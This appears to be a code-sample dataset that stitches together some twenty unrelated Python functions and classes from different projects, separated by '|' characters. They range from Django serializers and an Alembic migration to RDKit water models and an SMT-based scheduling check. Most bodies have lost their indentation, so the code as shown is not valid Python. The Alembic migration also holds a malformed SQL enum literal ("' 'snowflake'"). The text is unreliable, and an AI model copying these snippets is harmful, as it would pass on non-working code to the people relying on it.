def gen_x10(targ_house, targ_unit, targ_cmd):
res = [0, 0]
if _debug:
print(targ_house, targ_unit, targ_cmd, file=sys.stderr)
res[0] = houseCodes[targ_house]
if (targ_unit and (not (cmd_code[targ_cmd] & 128))):
res[0] |= ((unit_code[targ_unit] >> 8) & 255)
res[1] |= (unit_code[targ_unit] & 255)
res[1] |= (cmd_code[targ_cmd] & 255)
if _debug:
print(f'{res[0]:08b} {(res[0] ^ 255):08b} {res[1]:08b} {(res[1] ^ 255):08b}', file=sys.stderr)
return f'{res[0]:08b}{(res[0] ^ 255):08b}{res[1]:08b}{(res[1] ^ 255):08b}' |
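# Django test case: verify the treenode app's CSS and JS assets are discoverable through the
# staticfiles finders (skipped when 'treenode' is not in INSTALLED_APPS).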
class TreeNodeAdminTestCase(TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def assertStaticFile(self, path):
result = finders.find(path)
self.assertTrue((result is not None))
def test_staticfiles(self):
if ('treenode' not in settings.INSTALLED_APPS):
return
self.assertStaticFile('treenode/css/treenode.css')
self.assertStaticFile('treenode/js/treenode.js') |
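# Validate example events against the schema keyed by '<type>-<version>'; collect validation
# failures and events with no matching schema, honouring an optional shuffle, a max-example cap,
# and a progress report roughly every five seconds.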
def validateExamples(examples, schemas, maxExamples, shuffle):
failures = []
numberOfSuccessfulValidations = 0
unchecked = []
numChecked = 0
latestReportTime = time.perf_counter()
if shuffle:
random.shuffle(examples)
for (path, type, version, id, event) in examples:
schemaKey = ((type + '-') + version)
if (schemaKey in schemas):
try:
validate(event, schemas[schemaKey])
numberOfSuccessfulValidations += 1
except Exception as e:
failures.append((path, type, id, e))
else:
unchecked.append((path, type, id, event))
numChecked += 1
if ((maxExamples > 0) and (numChecked >= maxExamples)):
print((('Reached limit of ' + str(maxExamples)) + ' examples to validate. Breaking.'))
break
if ((time.perf_counter() - latestReportTime) > 5):
print((((('Checked ' + str(numChecked)) + ' / ') + str(len(examples))) + ' examples.'), flush=True)
latestReportTime = time.perf_counter()
return (failures, unchecked, numberOfSuccessfulValidations) |
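# Hydra/Accelerate-style evaluation entry point: instantiate the model, optionally resume from a
# checkpoint, then report per-category rotation/translation accuracies and AUC@30.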
@hydra.main(config_path='../cfgs/', config_name='default_test')
def test_fn(cfg: DictConfig):
OmegaConf.set_struct(cfg, False)
accelerator = Accelerator(even_batches=False, device_placement=False)
accelerator.print('Model Config:', OmegaConf.to_yaml(cfg), accelerator.state)
torch.backends.cudnn.benchmark = (cfg.test.cudnnbenchmark if (not cfg.debug) else False)
if cfg.debug:
accelerator.print('DEBUG MODE')
torch.backends.cudnn.deterministic = True
set_seed_and_print(cfg.seed)
model = instantiate(cfg.MODEL, _recursive_=False)
model = model.to(accelerator.device)
model = accelerator.prepare(model)
if cfg.test.resume_ckpt:
checkpoint = torch.load(cfg.test.resume_ckpt)
try:
model.load_state_dict(prefix_with_module(checkpoint), strict=True)
except:
model.load_state_dict(checkpoint, strict=True)
accelerator.print(f'Successfully resumed from {cfg.test.resume_ckpt}')
categories = cfg.test.category
if ('seen' in categories):
categories = TRAINING_CATEGORIES
if ('unseen' in categories):
categories = TEST_CATEGORIES
if ('debug' in categories):
categories = DEBUG_CATEGORIES
if ('all' in categories):
categories = (TRAINING_CATEGORIES + TEST_CATEGORIES)
categories = sorted(categories)
print(('-' * 100))
print(f'Testing on {categories}')
print(('-' * 100))
category_dict = {}
metric_name = ['Auc_30', 'Racc_5', 'Racc_15', 'Racc_30', 'Tacc_5', 'Tacc_15', 'Tacc_30']
for m_name in metric_name:
category_dict[m_name] = {}
for category in categories:
print(('-' * 100))
print(f'Category {category} Start')
error_dict = _test_one_category(model=model, category=category, cfg=cfg, num_frames=cfg.test.num_frames, random_order=cfg.test.random_order, accelerator=accelerator)
rError = np.array(error_dict['rError'])
tError = np.array(error_dict['tError'])
category_dict['Racc_5'][category] = (np.mean((rError < 5)) * 100)
category_dict['Racc_15'][category] = (np.mean((rError < 15)) * 100)
category_dict['Racc_30'][category] = (np.mean((rError < 30)) * 100)
category_dict['Tacc_5'][category] = (np.mean((tError < 5)) * 100)
category_dict['Tacc_15'][category] = (np.mean((tError < 15)) * 100)
category_dict['Tacc_30'][category] = (np.mean((tError < 30)) * 100)
Auc_30 = calculate_auc_np(rError, tError, max_threshold=30)
category_dict['Auc_30'][category] = (Auc_30 * 100)
print(('-' * 100))
print(f'Category {category} Done')
for m_name in metric_name:
category_dict[m_name]['mean'] = np.mean(list(category_dict[m_name].values()))
for c_name in (categories + ['mean']):
print_str = f'{c_name.ljust(20)}: '
for m_name in metric_name:
print_num = np.mean(category_dict[m_name][c_name])
print_str = (print_str + f'{m_name} is {print_num:.3f} | ')
if (c_name == 'mean'):
print(('-' * 100))
print(print_str)
return True |
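# Django REST framework-style ModelSerializer: builds default serializer fields from the model's
# pk, forward and reverse relations (honouring depth, read_only_fields and write_only_fields),
# and handles validation exclusions, object restoration and nested/m2m saving.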
class ModelSerializer(Serializer):
_options_class = ModelSerializerOptions
field_mapping = {models.AutoField: IntegerField, models.FloatField: FloatField, models.IntegerField: IntegerField, models.PositiveIntegerField: IntegerField, models.SmallIntegerField: IntegerField, models.PositiveSmallIntegerField: IntegerField, models.DateTimeField: DateTimeField, models.DateField: DateField, models.TimeField: TimeField, models.DecimalField: DecimalField, models.EmailField: EmailField, models.CharField: CharField, models.URLField: URLField, models.SlugField: SlugField, models.TextField: CharField, models.CommaSeparatedIntegerField: CharField, models.BooleanField: BooleanField, models.NullBooleanField: BooleanField, models.FileField: FileField, models.ImageField: ImageField}
def get_default_fields(self):
cls = self.opts.model
assert (cls is not None), ("Serializer class '%s' is missing 'model' Meta option" % self.__class__.__name__)
opts = cls._meta.concrete_model._meta
ret = OrderedDict()
nested = bool(self.opts.depth)
pk_field = opts.pk
while (pk_field.rel and pk_field.rel.parent_link):
pk_field = pk_field.rel.to._meta.pk
serializer_pk_field = self.get_pk_field(pk_field)
if serializer_pk_field:
ret[pk_field.name] = serializer_pk_field
forward_rels = [field for field in opts.fields if field.serialize]
forward_rels += [field for field in opts.many_to_many if field.serialize]
for model_field in forward_rels:
has_through_model = False
if model_field.rel:
to_many = isinstance(model_field, models.fields.related.ManyToManyField)
related_model = _resolve_model(model_field.rel.to)
if (to_many and (not model_field.rel.through._meta.auto_created)):
has_through_model = True
if (model_field.rel and nested):
field = self.get_nested_field(model_field, related_model, to_many)
elif model_field.rel:
field = self.get_related_field(model_field, related_model, to_many)
else:
field = self.get_field(model_field)
if field:
if has_through_model:
field.read_only = True
ret[model_field.name] = field
if (not self.opts.fields):
reverse_rels = []
else:
reverse_rels = opts.get_all_related_objects()
reverse_rels += opts.get_all_related_many_to_many_objects()
for relation in reverse_rels:
accessor_name = relation.get_accessor_name()
if ((not self.opts.fields) or (accessor_name not in self.opts.fields)):
continue
related_model = relation.model
to_many = relation.field.rel.multiple
has_through_model = False
is_m2m = isinstance(relation.field, models.fields.related.ManyToManyField)
if (is_m2m and hasattr(relation.field.rel, 'through') and (not relation.field.rel.through._meta.auto_created)):
has_through_model = True
if nested:
field = self.get_nested_field(None, related_model, to_many)
else:
field = self.get_related_field(None, related_model, to_many)
if field:
if has_through_model:
field.read_only = True
ret[accessor_name] = field
assert isinstance(self.opts.read_only_fields, (list, tuple)), '`read_only_fields` must be a list or tuple'
for field_name in self.opts.read_only_fields:
assert (field_name not in self.base_fields.keys()), ("field '%s' on serializer '%s' specified in `read_only_fields`, but also added as an explicit field. Remove it from `read_only_fields`." % (field_name, self.__class__.__name__))
assert (field_name in ret), ("Non-existent field '%s' specified in `read_only_fields` on serializer '%s'." % (field_name, self.__class__.__name__))
ret[field_name].read_only = True
assert isinstance(self.opts.write_only_fields, (list, tuple)), '`write_only_fields` must be a list or tuple'
for field_name in self.opts.write_only_fields:
assert (field_name not in self.base_fields.keys()), ("field '%s' on serializer '%s' specified in `write_only_fields`, but also added as an explicit field. Remove it from `write_only_fields`." % (field_name, self.__class__.__name__))
assert (field_name in ret), ("Non-existent field '%s' specified in `write_only_fields` on serializer '%s'." % (field_name, self.__class__.__name__))
ret[field_name].write_only = True
return ret
def get_pk_field(self, model_field):
return self.get_field(model_field)
def get_nested_field(self, model_field, related_model, to_many):
class NestedModelSerializer(ModelSerializer):
class Meta():
model = related_model
depth = (self.opts.depth - 1)
return NestedModelSerializer(many=to_many)
def get_related_field(self, model_field, related_model, to_many):
kwargs = {'queryset': related_model._default_manager, 'many': to_many}
if model_field:
kwargs['required'] = ((not (model_field.null or model_field.blank)) and model_field.editable)
if (model_field.help_text is not None):
kwargs['help_text'] = model_field.help_text
if (model_field.verbose_name is not None):
kwargs['label'] = model_field.verbose_name
if (not model_field.editable):
kwargs['read_only'] = True
if (model_field.verbose_name is not None):
kwargs['label'] = model_field.verbose_name
if (model_field.help_text is not None):
kwargs['help_text'] = model_field.help_text
return PrimaryKeyRelatedField(**kwargs)
def get_field(self, model_field):
kwargs = {}
if (model_field.null or (model_field.blank and model_field.editable)):
kwargs['required'] = False
if (isinstance(model_field, models.AutoField) or (not model_field.editable)):
kwargs['read_only'] = True
if model_field.has_default():
kwargs['default'] = model_field.get_default()
if issubclass(model_field.__class__, models.TextField):
kwargs['widget'] = widgets.Textarea
if (model_field.verbose_name is not None):
kwargs['label'] = model_field.verbose_name
if (model_field.help_text is not None):
kwargs['help_text'] = model_field.help_text
if model_field.flatchoices:
kwargs['choices'] = model_field.flatchoices
if model_field.null:
kwargs['empty'] = None
return ChoiceField(**kwargs)
if (issubclass(model_field.__class__, models.PositiveIntegerField) or issubclass(model_field.__class__, models.PositiveSmallIntegerField)):
kwargs['min_value'] = 0
if (model_field.null and issubclass(model_field.__class__, (models.CharField, models.TextField))):
kwargs['allow_none'] = True
attribute_dict = {models.CharField: ['max_length'], models.CommaSeparatedIntegerField: ['max_length'], models.DecimalField: ['max_digits', 'decimal_places'], models.EmailField: ['max_length'], models.FileField: ['max_length'], models.ImageField: ['max_length'], models.SlugField: ['max_length'], models.URLField: ['max_length']}
attributes = _get_class_mapping(attribute_dict, model_field)
if attributes:
for attribute in attributes:
kwargs.update({attribute: getattr(model_field, attribute)})
serializer_field_class = _get_class_mapping(self.field_mapping, model_field)
if serializer_field_class:
return serializer_field_class(**kwargs)
return ModelField(model_field=model_field, **kwargs)
def get_validation_exclusions(self, instance=None):
cls = self.opts.model
opts = cls._meta.concrete_model._meta
exclusions = [field.name for field in (opts.fields + opts.many_to_many)]
for (field_name, field) in self.fields.items():
field_name = (field.source or field_name)
if ((field_name in exclusions) and (not field.read_only) and (field.required or hasattr(instance, field_name)) and (not isinstance(field, Serializer))):
exclusions.remove(field_name)
return exclusions
def full_clean(self, instance):
try:
instance.full_clean(exclude=self.get_validation_exclusions(instance))
except ValidationError as err:
self._errors = err.message_dict
return None
return instance
def restore_object(self, attrs, instance=None):
m2m_data = {}
related_data = {}
nested_forward_relations = {}
meta = self.opts.model._meta
for (obj, model) in meta.get_all_related_objects_with_model():
field_name = obj.get_accessor_name()
if (field_name in attrs):
related_data[field_name] = attrs.pop(field_name)
for (obj, model) in meta.get_all_related_m2m_objects_with_model():
field_name = obj.get_accessor_name()
if (field_name in attrs):
m2m_data[field_name] = attrs.pop(field_name)
if issubclass(meta.many_to_many.__class__, tuple):
temp_m2m = list(meta.many_to_many)
else:
temp_m2m = meta.many_to_many
for field in (temp_m2m + meta.virtual_fields):
if isinstance(field, GenericForeignKey):
continue
if (field.name in attrs):
m2m_data[field.name] = attrs.pop(field.name)
for field_name in attrs.keys():
if isinstance(self.fields.get(field_name, None), Serializer):
nested_forward_relations[field_name] = attrs[field_name]
if (instance is None):
instance = self.opts.model()
for (key, val) in attrs.items():
try:
setattr(instance, key, val)
except ValueError:
self._errors[key] = [self.error_messages['required']]
instance._related_data = related_data
instance._m2m_data = m2m_data
instance._nested_forward_relations = nested_forward_relations
return instance
def from_native(self, data, files=None):
instance = super(ModelSerializer, self).from_native(data, files=files)
if (not self._errors):
return self.full_clean(instance)
def save_object(self, obj, **kwargs):
if getattr(obj, '_nested_forward_relations', None):
for (field_name, sub_object) in obj._nested_forward_relations.items():
if sub_object:
self.save_object(sub_object)
setattr(obj, field_name, sub_object)
obj.save(**kwargs)
if getattr(obj, '_m2m_data', None):
for (accessor_name, object_list) in obj._m2m_data.items():
setattr(obj, accessor_name, object_list)
del obj._m2m_data
if getattr(obj, '_related_data', None):
related_fields = dict([(field.get_accessor_name(), field) for (field, model) in obj._meta.get_all_related_objects_with_model()])
for (accessor_name, related) in obj._related_data.items():
if isinstance(related, RelationsList):
for related_item in related:
fk_field = related_fields[accessor_name].field.name
setattr(related_item, fk_field, obj)
self.save_object(related_item)
if related._deleted:
[self.delete_object(item) for item in related._deleted]
elif isinstance(related, models.Model):
fk_field = obj._meta.get_field_by_name(accessor_name)[0].field.name
setattr(related, fk_field, obj)
self.save_object(related)
else:
setattr(obj, accessor_name, related)
del obj._related_data |
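# JavaScript helpers for a text input component: isEmpty/hasLength/if_ return JsIf fragments,
# and autocomplete wires a jQuery UI autocomplete source onto the underlying input.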
class InputText(JsHtml.JsHtmlRich):
def isEmpty(self, js_funcs: types.JS_FUNCS_TYPES):
if (not isinstance(js_funcs, list)):
js_funcs = [js_funcs]
return JsIf.JsIf(('%s === ""' % self.component.dom.content.toStr()), js_funcs)
def hasLength(self, n: int, js_funcs: types.JS_FUNCS_TYPES):
if (not isinstance(js_funcs, list)):
js_funcs = [js_funcs]
return JsIf.JsIf(('%s.length >= %s' % (self.component.dom.content.toStr(), n)), js_funcs)
def if_(self, rule: str, js_funcs: types.JS_FUNCS_TYPES):
if (not isinstance(js_funcs, list)):
js_funcs = [js_funcs]
return JsIf.JsIf(rule, js_funcs)
('jqueryui', 'jqueryui')
def autocomplete(self, values: list, options: dict=None):
if (self.component.attr['type'] != 'text'):
raise ValueError('Autocomplete can only be used with input text components')
values = JsUtils.jsConvertData(values, None)
options = (options or {})
return JsUtils.jsWrap(('\n%s.autocomplete(Object.assign({source: %s}, %s))\n' % (JsQuery.decorate_var(self.varId, convert_var=False), values, options))) |
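# Alembic migration: recreate the connectiontype enum with the extended member list and re-point
# connectionconfig.connection_type at the new type.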
def upgrade():
op.execute('alter type connectiontype rename to connectiontype_old')
op.execute("create type connectiontype as enum('postgres', 'mongodb', 'mysql', ' 'snowflake', 'redshift', 'mssql', 'mariadb', 'bigquery', 'saas', 'manual', 'manual_webhook', 'timescale', 'fides', 'sovrn', 'attentive', 'dynamodb')")
op.execute('alter table connectionconfig alter column connection_type type connectiontype using connection_type::text::connectiontype')
op.execute('drop type connectiontype_old') |
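# Return True when the two tiles are adjacent along x or y and each of their rows/columns carries
# exactly one wire; otherwise fall through to None.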
def only_wire(tile1, tile2, tiles, x_wires, y_wires):
tile1_info = tiles[tile1]
tile2_info = tiles[tile2]
tile1_x = tile1_info['grid_x']
tile2_x = tile2_info['grid_x']
tiles_x_adjacent = (abs((tile1_x - tile2_x)) == 1)
if (tiles_x_adjacent and (len(x_wires[tile1_x]) == 1) and (len(x_wires[tile2_x]) == 1)):
return True
tile1_y = tile1_info['grid_y']
tile2_y = tile2_info['grid_y']
tiles_y_adjacent = (abs((tile1_y - tile2_y)) == 1)
if (tiles_y_adjacent and (len(y_wires[tile1_y]) == 1) and (len(y_wires[tile2_y]) == 1)):
return True
return None |
class Waters():
def make_molsetup_OPC():
raise NotImplementedError
rdmol = Chem.MolFromSmiles('O')
conformer = Chem.Conformer(rdmol.GetNumAtoms())
conformer.SetAtomPosition(0, Point3D(0, 0, 0))
rdmol.AddConformer(conformer)
molsetup = RDKitMoleculeSetup(rdmol)
return molsetup
def make_molsetup_TIP3P_AA():
rdmol = Chem.MolFromSmiles('O')
rdmol = Chem.AddHs(rdmol)
conformer = Chem.Conformer(rdmol.GetNumAtoms())
dist_oh = 0.9572
ang_hoh = np.radians(104.52)
conformer.SetAtomPosition(0, Point3D(0, 0, 0))
conformer.SetAtomPosition(1, Point3D(dist_oh, 0, 0))
conformer.SetAtomPosition(2, Point3D((np.cos(ang_hoh) * dist_oh), (np.sin(ang_hoh) * dist_oh), 0))
rdmol.AddConformer(conformer)
molsetup = RDKitMoleculeSetup(rdmol)
molsetup.bond[(0, 1)]['rotatable'] = False
molsetup.bond[(0, 2)]['rotatable'] = False
molsetup.atom_type[0] = 'n-tip3p-O'
molsetup.atom_type[1] = 'n-tip3p-H'
molsetup.atom_type[2] = 'n-tip3p-H'
molsetup.charge[0] = (- 0.834)
molsetup.charge[1] = 0.417
molsetup.charge[2] = 0.417
return molsetup |
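# Nintendo eShop game record: platform/region/title metadata plus helpers for a region-dependent
# unique id, the region's eShop wrapper and a per-country price lookup.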
class Game():
def __init__(self, platform: Platforms, region: Regions, title: str, nsuid: str=None, product_code: str=None):
self.platform: Platforms = platform
self.region: Regions = region
self.title: str = title
self.nsuid: str = nsuid
self.product_code: str = product_code
self.description: Optional[str] = None
self.slug: Optional[str] = None
self.players: int = 0
self.free_to_play: Optional[bool] = None
self.release_date: Optional[datetime] = None
self.categories: List[str] = []
self.developers: List[str] = []
self.languages: List[str] = []
self.publishers: List[str] = []
self.rating: Optional[Tuple[(Ratings, Any)]] = None
self.features: Dict[(Features, Any)] = {}
def unique_id(self) -> Optional[str]:
if (not self.product_code):
return None
if (self.region == Regions.JP):
return self.product_code[3:(- 1)]
else:
return self.product_code[4:(- 1)]
def eshop(self) -> Union[(NAeShop, EUeShop, JPeShop)]:
return ESHOPS[self.region](self)
def price(self, country: str) -> Price:
return get_price(country=country, game=self)
def __repr__(self):
return self.title |
@pytest.mark.asyncio
@pytest.mark.workspace_host
class TestDeleteRole():
    async def test_unauthorized(self, unauthorized_api_assertions: HTTPXResponseAssertion, test_client_api, test_data: TestData):
role = test_data['roles']['castles_visitor']
response = (await test_client_api.delete(f'/roles/{role.id}'))
unauthorized_api_assertions(response)
    @pytest.mark.authenticated_admin
    async def test_not_existing(self, test_client_api, not_existing_uuid: uuid.UUID):
response = (await test_client_api.delete(f'/roles/{not_existing_uuid}'))
assert (response.status_code == status.HTTP_404_NOT_FOUND)
    @pytest.mark.authenticated_admin
    async def test_valid(self, test_client_api, test_data: TestData, workspace_session: AsyncSession):
role = test_data['roles']['castles_visitor']
response = (await test_client_api.delete(f'/roles/{role.id}'))
assert (response.status_code == status.HTTP_204_NO_CONTENT)
user = test_data['users']['regular']
user_permission_repository = UserPermissionRepository(workspace_session)
user_permissions = (await user_permission_repository.list(user_permission_repository.get_by_user_statement(user.id)))
assert (len(user_permissions) == 1) |
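# i3 layout state: tracks per-workspace container ordering and the progress of window rebuild
# actions, kept in sync with the i3 connection.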
class State():
def __init__(self, i3):
self.context: Optional[Context] = None
self.workspace_sequences: Dict[(str, WorkspaceSequence)] = {}
self.rebuild_action = RebuildAction()
self.old_workspace_name = ''
self.sync_context(i3)
for workspace in i3.get_workspaces():
if workspace.focused:
self.add_workspace_sequence(workspace.name)
self.prev_workspace_name = workspace.name
def sync_context(self, i3l: Connection) -> Context:
tree = i3l.get_tree()
focused = tree.find_focused()
workspace = focused.workspace()
workspace_sequence = self.get_workspace_sequence(workspace.name)
self.context = Context(i3l, tree, workspace_sequence)
return self.context
def handle_rebuild(self, context: Context, container: Con):
if (self.rebuild_action.rebuild_cause is None):
self.end_rebuild(context, RebuildCause.WINDOW_NEW)
elif (len(self.rebuild_action.containers_to_recreate) == 0):
self.end_rebuild(context)
else:
if (self.rebuild_action.container_id_to_focus is None):
self.rebuild_action.container_id_to_focus = container.id
self.rebuild_action.next_rebuild(context)
def start_rebuild(self, rebuild_cause: RebuildCause, context: Context, main_mark: str, last_mark: str, con_id: int=0):
logger.debug(f'[state] rebuilding for {rebuild_cause}')
self.rebuild_action.start_rebuild(context, rebuild_cause, main_mark, last_mark, con_id)
def rebuild_closed_container(self, window_id: int) -> bool:
if (window_id in self.rebuild_action.containers_to_close):
self.rebuild_action.containers_to_close.remove(window_id)
return True
return False
def end_rebuild(self, context: Context, cause: RebuildCause=None):
self.rebuild_action.end_rebuild(context, cause)
def is_last_container_rebuilt(self, container: Con):
return ((self.rebuild_action.last_container_rebuilt is not None) and (self.rebuild_action.last_container_rebuilt.window == container.window))
def get_workspace_sequence(self, workspace_name: str) -> Optional[WorkspaceSequence]:
return (self.workspace_sequences[workspace_name] if (workspace_name in self.workspace_sequences) else None)
def add_workspace_sequence(self, workspace_name: str) -> WorkspaceSequence:
if (workspace_name not in self.workspace_sequences):
workspace_sequence = WorkspaceSequence()
self.workspace_sequences[workspace_name] = workspace_sequence
if (self.context.workspace.name == workspace_name):
for container in self.context.containers:
if (not self.workspace_sequences[workspace_name].contains(container.id)):
self.workspace_sequences[workspace_name].set_order(container)
self.workspace_sequences[workspace_name].set_stale(True)
self.context.workspace_sequence = self.workspace_sequences[workspace_name]
return self.workspace_sequences[workspace_name] |
def callback_query(args: str, payload=True):
async def func(ftl, __, query: CallbackQuery):
if payload:
thing = '{}\\_'
if re.search(re.compile(thing.format(ftl.data)), query.data):
search = re.search(re.compile('\\_{1}(.*)'), query.data)
if search:
query.payload = search.group(1)
else:
query.payload = None
return True
return False
else:
if (ftl.data == query.data):
return True
return False
return create(func, 'CustomCallbackQuery', data=args) |
class For_Loop_Statement(Compound_Statement):
def __init__(self, t_for):
super().__init__()
assert isinstance(t_for, MATLAB_Token)
assert ((t_for.kind == 'KEYWORD') and (t_for.value in ('for', 'parfor')))
self.t_for = t_for
self.t_for.set_ast(self)
self.n_ident = None
self.n_body = None
def loc(self):
return self.t_for.location
def set_ident(self, n_ident):
assert isinstance(n_ident, Identifier)
self.n_ident = n_ident
self.n_ident.set_parent(self)
def set_body(self, n_body):
assert isinstance(n_body, Sequence_Of_Statements)
self.n_body = n_body
self.n_body.set_parent(self)
def visit(self, parent, function, relation):
raise ICE('reached visit procedure for abstract base class for for-loops') |
class OptionSeriesWordcloudSonificationContexttracksMappingRate(Options):
    @property
    def mapFunction(self):
        return self._config_get(None)
    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)
    @property
    def mapTo(self):
        return self._config_get(None)
    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)
    @property
    def max(self):
        return self._config_get(None)
    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)
    @property
    def min(self):
        return self._config_get(None)
    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)
    @property
    def within(self):
        return self._config_get(None)
    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False) |
def test_when_field_can_be_merged_with_casts():
cfg = ControlFlowGraph()
r32 = [Variable('reg', unsigned_int, i) for i in range(10)]
r64 = [Variable('reg', unsigned_long, i) for i in range(10)]
int_var = Variable('int_var', signed_int, 0)
char_var = Variable('char_var', signed_char, 0)
instructions = [Assignment(r64[1], cast(unsigned_long, cast(unsigned_int, r64[0]))), Branch(Condition(OperationType.less_or_equal, [contract(unsigned_int, cast(unsigned_long, int_var)), Constant(4)])), Branch(Condition(OperationType.less_or_equal, [contract(unsigned_char, cast(unsigned_long, int_var)), Constant(4)])), Branch(Condition(OperationType.less_or_equal, [contract(unsigned_char, cast(unsigned_long, cast(unsigned_int, char_var))), Constant(64)])), Branch(Condition(OperationType.less_or_equal, [contract(unsigned_int, cast(unsigned_long, cast(unsigned_char, int_var))), Constant(64)]))]
cfg.add_node(BasicBlock(0, instructions))
RedundantCastsElimination().run(DecompilerTask('test', cfg))
assert ([i for i in cfg.instructions] == [Assignment(r64[1], cast(unsigned_int, r64[0])), Branch(Condition(OperationType.less_or_equal, [int_var, Constant(4)])), Branch(Condition(OperationType.less_or_equal, [cast(unsigned_char, int_var), Constant(4)])), Branch(Condition(OperationType.less_or_equal, [char_var, Constant(64)])), Branch(Condition(OperationType.less_or_equal, [cast(unsigned_int, cast(unsigned_char, int_var)), Constant(64)]))]) |
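# Accept a role-invite token: resolve the invited user, role and event, demote a previous owner to
# organizer when an 'owner' invite is accepted, create the UsersEventsRoles entry and mark the
# user as verified.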
@_invites_misc_routes.route('/role_invites/accept-invite', methods=['POST'])
def accept_invite():
token = request.json['data']['token']
try:
role_invite = RoleInvite.query.filter_by(hash=token).one()
except NoResultFound:
raise NotFoundError({'source': ''}, 'Role Invite Not Found')
else:
try:
user = User.query.filter_by(email=role_invite.email).first()
except NoResultFound:
raise NotFoundError({'source': ''}, 'User corresponding to role invite not Found')
try:
role = Role.query.filter_by(name=role_invite.role_name).first()
except NoResultFound:
raise NotFoundError({'source': ''}, 'Role corresponding to role invite not Found')
event = Event.query.filter_by(id=role_invite.event_id).first()
uer = UsersEventsRoles.query.filter_by(user=user).filter_by(event=event).filter_by(role=role).first()
if (not uer):
        if (role_invite.role_name == 'owner'):
            past_owner = UsersEventsRoles.query.filter_by(event=event, role=role).first()
            oldrole = Role.query.filter_by(name='organizer').first()
            if past_owner:
                prevuser = User.query.filter_by(id=past_owner.user_id).first()
                delete_previous_uer(past_owner)
                puer = UsersEventsRoles(user=prevuser, event=event, role=oldrole)
                save_to_db(puer, 'User Event Role changed')
role_invite.status = 'accepted'
save_to_db(role_invite, 'Role Invite Accepted')
event.group_id = None
save_to_db(event, 'Group ID Removed')
uer = UsersEventsRoles(user=user, event=event, role=role)
save_to_db(uer, 'User Event Role Created')
if (not user.is_verified):
user.is_verified = True
save_to_db(user, 'User verified')
return jsonify({'email': user.email, 'event': role_invite.event_id, 'event_identifier': role_invite.event.identifier, 'name': (user.fullname if user.fullname else None), 'role': uer.role.name}) |
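# SMT-backed scheduling check: prove the statements modify only configuration globals, and that any
# configuration value they change is either unchanged, overwritten, or never read afterwards;
# returns the set of visibly modified configuration points.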
def Check_DeleteConfigWrite(proc, stmts):
assert (len(stmts) > 0)
ctxt = ContextExtraction(proc, stmts)
p = ctxt.get_control_predicate()
G = ctxt.get_pre_globenv()
ap = ctxt.get_posteffs()
a = G(stmts_effs(stmts))
stmtsG = globenv(stmts)
slv = SMTSolver(verbose=False)
slv.push()
a = [E.Guard(AMay(p), a)]
(WrG, Mod) = getsets([ES.WRITE_G, ES.MODIFY], a)
(WrGp, RdGp) = getsets([ES.WRITE_G, ES.READ_G], ap)
only_mod_glob = ADef(is_empty(LDiff(Mod, WrG)))
is_ok = slv.verify(only_mod_glob)
if (not is_ok):
slv.pop()
raise SchedulingError(f'Cannot delete or insert statements at {stmts[0].srcinfo} because they may modify non-configuration data')
def is_cfg_unmod_by_stmts(pt):
pt_e = A.Var(pt.name, pt.typ, null_srcinfo())
cfg_unchanged = ADef(G(AEq(pt_e, stmtsG(pt_e))))
return slv.verify(cfg_unchanged)
cfg_mod = {pt.name: pt for pt in get_point_exprs(WrG) if (not is_cfg_unmod_by_stmts(pt))}
cfg_mod_visible = set()
for (_, pt) in cfg_mod.items():
pt_e = A.Var(pt.name, pt.typ, null_srcinfo())
is_written = is_elem(pt, WrG)
is_unchanged = G(AEq(pt_e, stmtsG(pt_e)))
is_read_post = is_elem(pt, RdGp)
is_overwritten = is_elem(pt, WrGp)
safe_write = AImplies(AMay(is_read_post), ADef(is_unchanged))
if (not slv.verify(safe_write)):
slv.pop()
raise SchedulingError(f'Cannot change configuration value of {pt.name} at {stmts[0].srcinfo}; the new (and different) values might be read later in this procedure')
invisible = ADef(AOr(is_unchanged, is_overwritten))
if (not slv.verify(invisible)):
cfg_mod_visible.add(pt.name)
slv.pop()
return cfg_mod_visible |
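# Gazetteer lookup over every token n-gram: return (start, end, surface form, matched values) for
# each span present in the dictionary.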
def recognize_ngram(tokens: List[str], gazetteer: Dict[(str, Set[str])]) -> List[Tuple[(int, int, str, Set[str])]]:
entities = []
for i in range(len(tokens)):
for j in range((i + 1), (len(tokens) + 1)):
key = ' '.join(tokens[i:j])
val = gazetteer.get(key, None)
if val:
entities.append((i, j, key, val))
return entities |
def extractCreamSavers(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
if ('WATTT' in item['tags']):
return buildReleaseMessageWithType(item, 'WATTT', vol, chp, frag=frag, postfix=postfix)
return False |
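# Attribute access layer: wraps a storage backend with has/get/add/remove/clear/all operations and
# per-attribute lock checks (attrread, attredit, attrcreate).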
class AttributeHandler():
_attrcreate = 'attrcreate'
_attredit = 'attredit'
_attrread = 'attrread'
_attrtype = None
def __init__(self, obj, backend_class):
self.obj = obj
self.backend = backend_class(self, self._attrtype)
def has(self, key=None, category=None):
ret = []
category = (category.strip().lower() if (category is not None) else None)
for keystr in make_iter(key):
            keystr = keystr.strip().lower()
ret.extend((bool(attr) for attr in self.backend.get(keystr, category)))
return (ret[0] if (len(ret) == 1) else ret)
def get(self, key=None, default=None, category=None, return_obj=False, strattr=False, raise_exception=False, accessing_obj=None, default_access=True, return_list=False):
ret = []
for keystr in make_iter(key):
attr_objs = self.backend.get(keystr, category)
if attr_objs:
ret.extend(attr_objs)
elif raise_exception:
raise AttributeError
elif return_obj:
ret.append(None)
if accessing_obj:
ret = [attr for attr in ret if attr.access(accessing_obj, self._attrread, default=default_access)]
if strattr:
ret = (ret if return_obj else [attr.strvalue for attr in ret if attr])
else:
ret = (ret if return_obj else [attr.value for attr in ret if attr])
if return_list:
return (ret if ret else ([default] if (default is not None) else []))
return (ret[0] if (ret and (len(ret) == 1)) else (ret or default))
def add(self, key, value, category=None, lockstring='', strattr=False, accessing_obj=None, default_access=True):
if (accessing_obj and (not self.obj.access(accessing_obj, self._attrcreate, default=default_access))):
return
if (not key):
return
category = (category.strip().lower() if (category is not None) else None)
keystr = key.strip().lower()
attr_obj = self.backend.get(key, category)
if attr_obj:
attr_obj = attr_obj[0]
self.backend.update_attribute(attr_obj, value, strattr)
else:
self.backend.create_attribute(keystr, category, lockstring, value, strattr)
def batch_add(self, *args, **kwargs):
self.backend.batch_add(*args, **kwargs)
